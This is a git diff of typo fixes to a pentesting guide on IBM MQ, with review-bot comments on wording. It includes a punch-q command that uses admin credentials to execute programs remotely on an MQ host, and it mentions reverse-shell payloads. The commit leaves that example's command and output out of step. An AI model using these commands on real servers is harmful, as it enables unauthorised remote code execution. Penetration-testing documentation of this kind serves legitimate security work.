Update 1414-pentesting-ibmmq.md (typos)
parent 30cbf6ebc7
commit fe88ec40e7
|
@ -102,7 +102,7 @@ It happens that some IBM MQ instances accept **unauthenticated** MQ requests, so
|
||||||
|
|
||||||
As soon as we get one channel name (here: `DEV.ADMIN.SVRCONN`), we can enumerate all other channels.
|
As soon as we get one channel name (here: `DEV.ADMIN.SVRCONN`), we can enumerate all other channels.
|
||||||
|
|
||||||
The enumeration can basically be done with this code snippet `code/examples/dis_channels.py` from *pymqi*:
|
The enumeration can basically be done with this code snippet `code/examples/dis_channels.py` from **pymqi**:
|
||||||
|
|
||||||
```python
|
```python
|
||||||
import logging
|
import logging
|
||||||
|
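Review bot: The changed sentence still reads "The enumeration can basically be done with this code snippet", which is loose wording for a typo pass that already touches this line. Suggest "The enumeration can be done with the `code/examples/dis_channels.py` example from **pymqi**:". The switch from `*pymqi*` to `**pymqi**` matches the bold **punch-q** used later in the file, so that part is consistent.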
@ -222,7 +222,7 @@ You can target queue(s)/channel(s) to sniff out / dump messages from them (non-d
|
||||||
>
|
>
|
||||||
> *Note: always according to IBM MQ documentation (Administration Reference), there is also an HTTP endpoint at `/admin/action/qmgr/{qmgrName}/mqsc` to run the equivalent MQSC command for service creation (`DEFINE SERVICE`). This aspect is not covered yet here.*
|
> *Note: always according to IBM MQ documentation (Administration Reference), there is also an HTTP endpoint at `/admin/action/qmgr/{qmgrName}/mqsc` to run the equivalent MQSC command for service creation (`DEFINE SERVICE`). This aspect is not covered yet here.*
|
||||||
|
|
||||||
The service creation / deletion with PCF for remote program execution is can be done by **punch-q**:
|
The service creation / deletion with PCF for remote program execution can be done by **punch-q**:
|
||||||
|
|
||||||
**Example 1**
|
**Example 1**
|
||||||
|
|
||||||
|
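Review bot: On the changed line, "can be done by **punch-q**" would read better as "can be done with **punch-q**", since punch-q is the tool rather than the actor. The unchanged note just above has the same kind of wording problems ("always according to IBM MQ documentation", "not covered yet here") and could be fixed in the same pass, for example "still according to the IBM MQ documentation" and "not covered here yet".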
@ -240,7 +240,7 @@ You can also enumerate existing programs on the machine (here `/bin/doesnotexist
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/doesnotexist" --arg
|
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/doesnotexist" --arg
|
||||||
s "-c id"
|
s "whatever"
|
||||||
Command: /bin/doesnotexist
|
Command: /bin/doesnotexist
|
||||||
Arguments: -c id
|
Arguments: -c id
|
||||||
Service Name: 6e3ef5af652b4436
|
Service Name: 6e3ef5af652b4436
|
||||||
|
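Review bot: The example command and its output no longer agree: the wrapped argument line now passes `"whatever"`, but the unchanged output line below it still shows `Arguments: -c id`. Either keep `"-c id"` in the command or update the `Arguments:` line to match. This is a content change rather than a typo fix, so the commit message should mention it. Separately, the `--args` flag is split across two lines (`--arg` then `s "whatever"`) in both the old and new versions; joining them would keep the flag readable.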
@ -262,7 +262,7 @@ For easy reverse shell, **punch-q** proposes also two reverse shell payloads :
|
||||||
* One with bash
|
* One with bash
|
||||||
* One with perl
|
* One with perl
|
||||||
|
|
||||||
*Of course you can build a custom one with the `execute`.*
|
*Of course you can build a custom one with the `execute` command.*
|
||||||
|
|
||||||
For bash:
|
For bash:
|
||||||
|
|
||||||
|
|
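Review bot: On the changed line, "the `execute` command" does not match how the earlier example in this file invokes it (`command execute`); suggest naming the subcommand the same way in both places. The sentence quoted in the hunk header, "**punch-q** proposes also two reverse shell payloads :", has similar wording and spacing issues (word order, stray space before the colon) and could be cleaned up in this commit as well.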